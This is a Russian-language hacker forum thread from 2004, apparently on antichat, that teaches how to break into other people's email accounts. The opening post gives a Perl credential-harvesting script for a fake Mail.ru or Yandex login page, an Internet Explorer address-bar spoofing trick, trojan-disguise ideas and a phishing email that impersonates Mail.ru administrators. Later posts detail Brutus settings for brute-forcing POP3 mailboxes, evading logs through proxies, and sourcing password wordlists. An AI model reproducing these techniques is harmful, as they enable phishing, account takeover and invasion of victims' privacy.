Взлом мыла

Discussion in 'Уязвимости Mail-сервисов' started by Че Гевара, 11 Feb 2004.

Thread Status:
Not open for further replies.
  1. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,054
    Likes Received:
    28
    Reputations:
    8
    В данной статье я хочу рассказать вам о способах взлома E-mail'a всвязи с очень большим кол-вом сообщений на эту тему:
    Рассмотрим несколько способов:
    1) Баг в IE + Соц. Инженерия
    1) Троян
    3) Находчивость
    4) Грубая сила

    Вариант 1.
    Допустим вам известно, что жертва имеет IE и просматривает почту через Web интерфейс, тогда необходимо отправить ей письмо полностью идентичное системе идентификации, например такого вида: http://mail.yandex.ru/login

    Все надо оставить таким же, вот только написать скрипт, который будет вам отсылать пароли на почту например... Этот скрипт выглядит приблизительно так:

    &GetFormInput;
    $name=$field{'name'};
    $pass=$field{'pass'};

    sub GetFormInput {

    (*fval) = @_ if @_ ;
    local ($buf);
    if ($ENV{'REQUEST_METHOD'} eq 'POST') {
    read(STDIN,$buf,$ENV{'CONTENT_LENGTH'});
    }
    else {
    $buf=$ENV{'QUERY_STRING'};
    }
    if ($buf eq "") {
    return 0 ;
    }
    else {
    @fval=split(/&/,$buf);
    foreach $i (0 .. $#fval){
    ($name,$val)=split (/=/,$fval[$i],2);
    $val=~tr/+/ /;
    $val=~ s/%(..)/pack("c",hex($1))/ge;
    $name=~tr/+/ /;
    $name=~ s/%(..)/pack("c",hex($1))/ge;

    if (!defined($field{$name})) {
    $field{$name}=$val;
    }
    else {
    $field{$name} .= ",$val";
    }
    }
    }
    return 1;
    }
    open (OUTFILE, ">>pass.txt");
    print OUTFILE "$name";
    print OUTFILE "\n$pass";
    print OUTFILE "\n=======END=======\n\n";
    close (OUTFILE);
    print "Location: http://your_redirect_URL\n"

    А далее необходимо заюзать новый баг в IE с подменой адресной строки... Выглядит это так:

    <button onclick="location.href=unescape('http://www.microsoft.com@www.antichat.ru ');" style="font: 8pt verdana, sans-serif;" target="_new">


    Проверить баг в IE



    Теперь нажав на эту кнопку в адресной строке будет написано www.microsoft.com , а загрузится наш античат....

    Теперь состыковав все эти 3 вещи мы отправляем юзеру письмо, в котором пишем про ошибку аутентификации, а после ввода пароля отправляем его уже на настоящую страницу авторизации...



    Смысл этого скрипта состоит в том, что если у вас WinXP + MSIE, то в корне диска С запустив такой скрипт вы сможете найти файл nsd_ru_hello.txt
    Но никто не мешает вам переделать этот скрипт под себя и заставить скачиваться заменяя WMPlayer например:)))
    Это один из эффектнейших способов впаривания трояна....

    3) Находчивость.
    Рассмотрим момент, ничего не работает, Тогда идем на Секретный вопрос и смотрим туда.
    Вариант 1. Нормальный вопрос: "Номер телефона"
    Находим icq этого человека и если он порядочный ламер, то он ввел туда все, что нужно в том числе и свой номер телефона....
    Вариант 2. Ненормальный вопрос: "а"
    Вот тут уже все сложнее, но мне повезло в этом плане, и ответом на вопрос было "б"....

    4) Грубая сила.
    Нет смысла рассуждать на эту тему, берется программа: Brutus aet2 и устанавливается на перебор пароля по 1 логину...

    ------------------------------------------------------------
    Большинство информации взято с сайта www.nsd.ru, так что скажем им "большое спасибо"...
    Также я взял инфу с хакзоны... Ее разместил dima k-17.
    ------------------------------------------------------------
    Естесственно это далеко не все варианты, но новичкам я рекомендую социальную инженерию...

    Пишем письмо от админов (н-р: Администрация Mail.ru или Администрация Yandex.ru) . Адрес должен быть соответствующий, а то юзер догадется, если твой мейл будет ded-makar... Допустим, мы зарегистрировали аккаунт типа admin@mail.ru, что делаем дальше:
    Тему ты выбираешь вроде "Подтверждение аккаунта vasja_pupkin"
    Далее мы пишем:
    Здравствуйте, Вася Пупкин!
     С Вашего почтового ящика vasja_pupkin@mail.ru происходит рассылка спама. Возможно, кто-то умышленно рассылает спам от Вашего имени, но Вам нужно подтвердить свои права на этот ящик. Для этого Вам необходимо ответить на это письмо, в теме указав свои реквизиты для vasja_pupkin@mail.ru в формате login;passwd.
    С уважением, Администрация Mail.ru
    Для убедительности я переводил на английский. В этом случае пароль высылало ок. 70 %.
    Как видишь способов придумать можно вагон и маленькую тележку, но главное не переборщить со всем этим делом. Так , однажды, один "умник" написал, что mail.ru похакали и мне срочно нужно выслать пароль. :)
    Че Гевара
     
    zloysedoy likes this.
  2. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,054
    Likes Received:
    28
    Reputations:
    8
    З.Ы. Чуть не забыл... Всем известен баг в IE эксплорере 6 версии. Так что проще загрузить на комп exe файл, который, как троян, будет высылать вам расшифрованный пасс от мыла. Этот при условии, что юзер использует почтовую программу...
     
  3. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,054
    Likes Received:
    28
    Reputations:
    8
    Рассмотрим, как взломать e-mail при помощи Brutus -AET2. Качаем его Отсюда
    Взламывать другие веб-ресурсы этой программой затруднительно, а для мыла и новичков - самое то!
    Ну, начнем  описание:
    1. В поле Target (цель) мы вводим pop3.mail.ru или pop3.yandex.ru соответственно.
    2. В Type(тип) мы выбираем pop3
    3. Port ставится автоматически
    4. Вот теперь приступим к настройкам, которые непосредственно влияют на скорость перебора паролей:
    Connections(Кол-во одновременных подключений) - я ставлю до 45, а Timeout(Время ожидания, пауза) - на 15. Лично у меня модемное соединение... Насчет выделенки - не знаю.
    5. Use Proxy (использовать прокси-сервер) - я вообще не юзаю. А зачем? В лог переборы все-равно не вносятся.
    6. Authentication Options (опции аундефикации)- мы ставим галочку на
    а) Use Username
    б) Single User
    7. В поле userID вписывам нужный ящик - Lamerok@mail.ru
    7. Pass Mode - Word list (Перебор по словарю)
      Pass File - words.txt
    Я хочу остановиться подробнее на словаре. Стандартный словарь уже не канает, так что надо либо скачивать другой или дополнять старый. Лично я дополнил его паролями вроде 123, 321, 007 и т.п. Все зависит от твоей терпеливости...
    Допустим, мы взломали мыло. Все - бежим туда! А нет... Не совершайте таких ошибок, которые соваршил я. Обязательно заходите через прокси! В логе остается ip последнего зашедшего через http или pop3.
    Вроде, я все расписал подробно. Если что-то не понятно, то спрашивайте.
    Че Гевара[​IMG]
     
  4. Guest

    Guest Guest

    Reputations:
    0
    А можно как-нибудь пробутфорсить пароль на вопрос при напоминании пароля???????
     
  5. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,054
    Likes Received:
    28
    Reputations:
    8
    Нет, там другая система... Видишь ли, принцип взлома брутусом состоит в том, что тебя пропускают в сам ящик. Т.е. Ты выбираешь pop3.mail.ru, а при удачном взломе попадаешь в другую дерикторию. То бишь, заход на ящик kovarnoe-lamo@mail.ru с паролем 123 - удачен. А в системе востановления паролей:
    1. Как ты укажешь дату рождения?
    2. Он просто не сработает из-за того, что при любом варианте ответа, он пошлет вас на одну и туже страницу...
    Если ты хочешь взломать мыло через систему восстановления паролей, то попробуй социальную инженерию.
     
  6. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,054
    Likes Received:
    28
    Reputations:
    8
    Чем не удобен брутус, так это его списком паролей. Его писали англичане с ориентиром на пассы своих соотечественников. Нужно скачивать другую базу или дополнять "заводскую" [​IMG]
     
  7. Николь

    Николь New Member

    Joined:
    19 Dec 2003
    Messages:
    49
    Likes Received:
    0
    Reputations:
    0
    Сейчас почитаю ради интереса...А брутус этот...мягко  сказано, неудобен...но оно и понятно...
     
  8. Guest

    Guest Guest

    Reputations:
    0
    А ссылочек(работающих) на словарики никто не даст?
     
  9. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,054
    Likes Received:
    28
    Reputations:
    8
    На античате есть...
     
  10. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,054
    Likes Received:
    28
    Reputations:
    8
  11. limbonic

    limbonic New Member

    Joined:
    5 Dec 2003
    Messages:
    54
    Likes Received:
    0
    Reputations:
    0
    На www.passwords.ru  ..там можно неплохие словарики найти ... [​IMG]
     
  12. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,054
    Likes Received:
    28
    Reputations:
    8
    Что-то не нашел я там словарей...
     
  13. Dark_Ghost

    Dark_Ghost New Member

    Joined:
    14 Aug 2003
    Messages:
    73
    Likes Received:
    1
    Reputations:
    0
  14. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,054
    Likes Received:
    28
    Reputations:
    8
    Гы.. Смотрел не внимательно... [​IMG]
     
  15. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,054
    Likes Received:
    28
    Reputations:
    8
    Скачал я русский словарь... Фуфло.
     
  16. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,054
    Likes Received:
    28
    Reputations:
    8
    Не одного мыла с таким словарем не взломать [​IMG]
     
  17. Dark_Ghost

    Dark_Ghost New Member

    Joined:
    14 Aug 2003
    Messages:
    73
    Likes Received:
    1
    Reputations:
    0
    я бы сказал, с такими руками..
     
  18. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,054
    Likes Received:
    28
    Reputations:
    8
    Не остроумно...
     
  19. Dark_Ghost

    Dark_Ghost New Member

    Joined:
    14 Aug 2003
    Messages:
    73
    Likes Received:
    1
    Reputations:
    0
    зато правдиво
     
  20. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,054
    Likes Received:
    28
    Reputations:
    8
    Смотря кого рассматривать...
     
Loading...
Thread Status:
Not open for further replies.